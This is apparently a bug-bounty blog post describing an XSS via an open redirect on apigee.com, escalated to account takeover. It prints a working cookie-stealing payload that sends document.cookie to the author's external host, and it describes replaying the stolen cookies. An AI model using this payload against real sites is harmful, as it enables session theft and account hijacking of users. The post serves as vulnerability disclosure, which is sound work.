Account takeover on A Google Acquisitions apigee.com


Hii gyes..
So back in the summer I decided to get a HoF in Google cause it was my one of the most wanted Dreams.. So I started searching for new stuffs of Google then heard about Google acquisitions and thought to try my luck on one of the Google Acquisitions apigee.com .
First let me tell you about Google Acquisitions. Actually i am not telling you here about it if you want to Know about it visit this.
Back to the Topic!!
So after doing a Recon. I came to do manual testing and almost 10 min later I discovered a open redirect but the bad thing was that Google don't accept Open redirect and I was like...

Then I try to do a XSS by this payload javascript:alert(1) and it worked I was so happy then i thought to report it like a high impact issue so rapidly I started searching for the stuffs done with an XSS and found a blog-post to steal the cookies of a user through XSS so tried it but it didn't worked for me because of wrong payload entry so I decided to first study the payload then make one that will match my situation so the payload I made was:
javascript:document.location="https://silverpoision.000webhostapp.com/stealer.php%3Fcookie%3D"%20%2B%20document.cookie
this simple payload will redirect all the cookies to my server and store it in the log.txt .
(If any one want's the source code , then can ping me at Fb or twitter )
So at that time a point tackle in my mind to make it a account takeover.So i started searching for account takeover and read a same PoC as same as my condition but a bit different in that PoC there was no Open redirect just An XSS then cookie stealing and account takeover through replaying the cookies.
So I thought what's wrong with mee? I can also do this, and after Replaying the Cookies it logged me into my account. 
My reaction was like........



Reported it to google at the same movement .
Lesson learned :
Try to exploit a vulnerability instead of reporting it.

Video PoC


Timeline:-
Reported                                              28/06/2017
Your report triage                                29/06/2017
same day Nice catch.... Got HoF
Got Duplicate                                      20/07/2017

After it I reported some more vulnerabilities to google and fix is in process.
Also I will disclose my Microsoft PoC soon here..
Sorry for my Bad English xD
Thanks for Reading
Hope you enjoy gyes..


Contacts:

Facebook , Twitter , Github , Email

Comments

Popular Posts